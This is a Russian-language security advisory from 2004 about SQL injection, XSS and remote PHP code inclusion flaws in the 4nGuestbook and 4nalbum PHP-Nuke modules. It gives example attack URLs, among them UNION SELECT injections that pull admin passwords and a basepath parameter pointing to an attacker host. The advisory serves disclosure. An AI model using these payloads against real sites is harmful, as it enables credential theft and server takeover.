Security Lab

Несколько уязвимостей в 4nGuestbook и 4nalbum модулях для PHP-Nuke

Дата публикации:19.03.2004
Всего просмотров:6330
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: 4nGuestbook 0.x
Уязвимые версии: 4nalbum и 4nGuestbook 0.92

Описание: Уязвимость обнаружена в 4nGuestbook и 4nalbum модулях для PHP-Nuke. Удаленный авторизованный администратор может внедрить произвольные SQL команды. Удаленный пользователь может выполнить XSS нападение. Удаленный пользователь может выполнить произвольный PHP код на уязвимом сервере. 1. 4nGuestbook

http://[target]/nuke71/modules.php?name=4nGuestbook&entry=x[xss%20code%20here]

http://[target]/nuke71/admin.php?op=NukebookEditEntry&nbid=-2%20UNION%20SELECT%20null%20/*
2. 4nalbum
http://[target]/nuke71/modules/4nalbum/public/displaycategory.php?basepath=h ttp://[attacker]

http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION %20SELECT%20null,null,pwd,2,null,null,null

http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,aid, 2,null,null,null

URL производителя: http://www.warp-speed.de/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Multiple vulnerabilities in 4nalbum module